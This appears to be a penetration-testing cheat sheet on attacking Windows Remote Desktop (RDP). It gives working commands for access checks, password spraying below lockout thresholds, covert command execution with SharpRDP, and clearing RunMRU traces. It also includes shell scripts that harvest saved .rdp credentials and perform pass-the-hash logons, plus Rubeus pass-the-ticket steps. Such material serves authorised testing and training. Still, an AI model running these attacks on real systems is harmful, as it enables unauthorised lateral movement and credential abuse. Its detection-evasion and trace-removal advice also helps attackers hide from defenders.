3389 - RDP

Remote Desktop Protocol (RDP) is a network communication protocol developed by Microsoft that allows us to connect to and control a computer from another location over a network or the internet. It provides a graphical interface so we can view the remote system’s desktop and use its applications as if we were physically present. RDP is commonly used to support remote working, technical support, and the management of servers and workstations without requiring physical access.

By default, RDP access is restricted to members of the local Administrators group and to users added to the Remote Desktop Users group on the target (the "Allow log on through Remote Desktop Services" right).

Connect

We can check for RDP access across a network from a Linux host with nxc:

# Access check
nxc rdp 10.120.220.0/24 -u x7331 -p 'P@ssword123!' -d batman.local

Once we have a target host, we can connect directly with tools like xfreerdp and remmina.

Note: CTRL+ALT+ENTER toggles full screen in xfreerdp.

# Connect (pick one of /dynamic-resolution, /f or /smart-sizing for the display; +drives redirects all local drives)
xfreerdp /u:x7331 /p:'P@ssword123!' /d:batman.local /v:10.120.220.10 +drives /clipboard /dynamic-resolution

# Redirect the local directory local_dir (relative to the current directory) into the session as a drive named "share"
# Syntax is /drive:<name>,<path>
xfreerdp /u:x7331 /p:'P@ssword123!' /v:10.120.220.10 /drive:share,local_dir

# For slow connections: 8-bit colour, compression, no themes/wallpaper/audio, current directory shared as "linux"
xfreerdp /u:x7331 /p:'P@ssword123!' /v:10.120.220.10 /dynamic-resolution /drive:linux,. /bpp:8 /compression -themes -wallpaper /clipboard /audio-mode:0 /auto-reconnect -glyph-cache

# Clear cached server certificates (FreeRDP 2.x keeps them in known_hosts2 and server/)
rm -f ~/.config/freerdp/known_hosts ~/.config/freerdp/known_hosts2
rm -f ~/.config/freerdp/server/*.pem

# Launch remmina
remmina

From a Windows host we can use mstsc (Microsoft Terminal Services Client) or SharpRDP. The latter suits more covert operations: instead of opening a visible desktop session, it establishes an authenticated RDP connection in the background and executes commands remotely.

SharpRDP executes commands through the Run dialog, so it leaves traces in the RunMRU registry key; CleanRunMRU removes those records. To compile either tool we can use the csc compiler that ships with the .NET Framework. Clearing RunMRU does not remove the other traces of the session, such as logon events (4624 with logon type 10) and the TerminalServices-LocalSessionManager log.

Note: The RunMRU (Most Recently Used) registry key, HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, stores the last 26 commands entered via the Win+R Run dialog. It is a per-user forensic artifact commonly used to reconstruct which programs and scripts a user executed.

Attacks

Connection Files

Check for connection details within .rdp files (typically under user profiles, Desktop and Documents). The fields worth pulling out are full address:s:, username:s:, domain:s: and password 51:b:; the last is a DPAPI blob encrypted for the user who saved it, so it only decrypts with that user's DPAPI master key, not on another host.
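An added example (not part of the original page) of hunting for .rdp files and extracting the fields above; the search roots, the host and user names and the sample file contents are constructed. mstsc saves .rdp files as UTF-16LE, which is why the parser strips NUL bytes before matching.

```shell
#!/bin/sh
# Added example: locate .rdp connection files and report what they leak.
# Directory roots, hosts, users and the sample file below are made up.

# $@ = directories to search (mounted profiles, loot directories, ...)
find_rdp_files() {
    find "$@" -type f -iname '*.rdp' 2>/dev/null
}

# $1 = file, $2 = field name as written in the file (e.g. "full address")
# mstsc writes .rdp files as UTF-16LE: drop NULs, CRs and the BOM bytes (0xFF 0xFE)
# so that ASCII and UTF-16LE files match the same anchored pattern. Anchoring matters:
# "alternate full address:s:" must not be taken for "full address:s:".
rdp_field() {
    tr -d '\000\015\377\376' < "$1" | grep -a -i "^$2:[sib]:" | head -n 1 | cut -d: -f3-
}

# One line per file: host, domain, user and whether a DPAPI-protected password is saved.
rdp_file_report() {
    f=$1
    host=$(rdp_field "$f" 'full address')
    dom=$(rdp_field "$f" 'domain')
    user=$(rdp_field "$f" 'username')
    if [ -n "$(rdp_field "$f" 'password 51')" ]; then saved=yes; else saved=no; fi
    printf 'file=%s host=%s domain=%s user=%s saved_password=%s\n' "$f" "$host" "$dom" "$user" "$saved"
}

# Constructed sample in the layout mstsc uses (ASCII with CRLF; a UTF-16LE file from
# mstsc goes through the same tr step and parses identically).
make_sample_rdp() {
    printf 'screen mode id:i:2\r\nfull address:s:10.120.220.10:3389\r\nalternate full address:s:rdp.batman.local\r\nusername:s:x7331\r\ndomain:s:batman.local\r\npassword 51:b:01000000D08C9DDF0115D1118C7A00C04FC297EB\r\n' > "$1"
}

# Demo on the constructed sample; in practice point find_rdp_files at loot directories.
d=$(mktemp -d)
make_sample_rdp "$d/saved.rdp"
find_rdp_files "$d" | while IFS= read -r f; do rdp_file_report "$f"; done
rm -rf "$d"
```

The saved_password flag tells you whether the file is worth carrying back to the user's own host (or pairing with their DPAPI master key) rather than being a dead end.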

Password Spraying

We can perform a password spray attack with nxc or hydra. Spray one password against many users per round and stay below the domain lockout threshold within its observation window (check it first with the password policy), otherwise the spray locks accounts out and gets noticed.

Lateral Movement (Restricted Admin Mode)

Restricted Admin Mode is a security feature Microsoft introduced with Windows 8.1 and Server 2012 R2 (and backported to Windows 7 and Server 2008 R2 in KB2871997) to reduce the risk of credential theft during RDP sessions. Normally an RDP logon is interactive: the user's credentials are sent to the remote system and cached there. In Restricted Admin Mode the client proves its identity without handing over reusable credentials; the session runs with the user's rights on that host, but anything it reaches over the network is accessed as the computer account, much like a network logon.

Note: An interactive logon provides full credentials to the remote system, so reusable authentication material such as NTLM hashes or Kerberos tickets may sit in LSASS memory and be exposed if the host is compromised. A network logon leaves no reusable credentials on the target, which reduces that risk; the flip side is that proving identity only takes an NTLM hash or a Kerberos ticket rather than the user's password.

This protection therefore carries a trade-off. Because the target never needs the reusable credential, an attacker holding a stolen hash or ticket can authenticate without knowing the password, which makes Pass-the-Hash (PtH) and Pass-the-Ticket (PtT) lateral movement over RDP possible. Two conditions apply: the mode is off by default and has to be enabled on the target (DisableRestrictedAdmin set to 0 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa), and the client has to request it, since a normal connection still performs an interactive logon.

The mode is limited to accounts with administrative rights on the target, such as local or domain administrators, because the remote system relies on the existing security context instead of building a full credential session. In domain environments, members of Domain Admins are local administrators on domain-joined systems by default and can use it unless policy restricts them.

Feature                             Interactive logon               Network logon (Restricted Admin Mode)
Password required                   Yes                             Not required if hash/ticket available
NTLM hash allowed                   No                              Yes (PtH)
Kerberos ticket allowed             No                              Yes (PtT)
Credential caching on remote host   Stored in memory                Not cached
Typical use                         Standard RDP / console logon    Restricted Admin Mode / remote network authentication
Admin account required              Optional                        Must be admin on target

We can check whether Restricted Admin Mode is enabled by querying the registry with reg (the DisableRestrictedAdmin value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa; 0 means enabled, a non-zero or missing value means disabled).

Pass-the-Hash

We can perform a PtH attack from Linux using xfreerdp.
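An added example (not part of the original page) that covers both the Restricted Admin check and the PtH connection from Linux. Because the check runs from Linux it uses impacket's reg.py rather than the Windows reg.exe the page mentions; the registry value is the real one. The host, domain, user and NT hash are made up, the reg.py output format the parser expects is an assumption, and the xfreerdp flags (/pth, /restricted-admin, /cert:ignore) are real.

```shell
#!/bin/sh
# Added example: confirm Restricted Admin Mode on a target, then RDP in with an NT hash.
# Target, domain, user and the hash below are made up.

NT_HASH=${NT_HASH:-b4b9b02e6f09a9bd760f388b67351e2b}   # constructed NT hash, no LM part

# Turn reg.py output for the Lsa key (read from stdin) into a verdict.
# Assumed line shape: "DisableRestrictedAdmin REG_DWORD 0x0". Only a line that carries
# the value name followed by a REG_ type counts; error lines fall through to "absent".
interpret_restricted_admin() {
    line=$(grep -i 'DisableRestrictedAdmin[[:space:]]*REG_' | head -n 1 | tr -d '\r' | sed 's/[[:space:]]*$//')
    case "$line" in
        '')                  echo "disabled (value absent, Windows default)" ;;
        *0x0|*[[:space:]]0)  echo "enabled" ;;
        *)                   echo "disabled (DisableRestrictedAdmin set to non-zero)" ;;
    esac
}

# $1 = target, $2 = domain, $3 = user. Authenticates with the NT hash over the remote
# registry (reg.py starts the RemoteRegistry service when the account is an admin).
check_restricted_admin() {
    reg.py "$2/$3@$1" -hashes ":$NT_HASH" query \
        -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin \
        | interpret_restricted_admin
}

# $1 = target, $2 = domain, $3 = user. /pth: takes the NT hash; /restricted-admin states
# the intent explicitly (FreeRDP enables it on its own when /pth is given). If the mode is
# disabled on the target the logon is refused, which is the usual reason a PtH over RDP fails.
rdp_pth() {
    xfreerdp /v:"$1" /d:"$2" /u:"$3" /pth:"$NT_HASH" /restricted-admin /cert:ignore /dynamic-resolution
}

# Demo on a constructed reg.py line; the live sequence is the commented pair below.
printf 'DisableRestrictedAdmin REG_DWORD 0x0\n' | interpret_restricted_admin
# [ "$(check_restricted_admin 10.120.220.10 batman.local x7331)" = enabled ] && rdp_pth 10.120.220.10 batman.local x7331
```

When the check reports the value as absent, enabling it yourself (writing the DWORD) requires admin rights on the target already, so at that point the hash is better spent on SMB or WinRM than on RDP.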

Pass-the-Ticket

For the PtT attack, we can use rubeus and mstsc from a Windows host:

  1. Create a sacrificial process (rubeus createnetonly) to get a new, isolated logon session separate from the current user context, so that Kerberos tickets can be injected without touching the existing credentials.

  2. Use the rc4 value (the NTLM hash) not for direct authentication but to request a TGT from the DC (rubeus asktgt with /rc4:).

  3. Inject the TGT into the sacrificial process (/ptt) and use it for subsequent authentication, launching mstsc with /restrictedAdmin from that process.
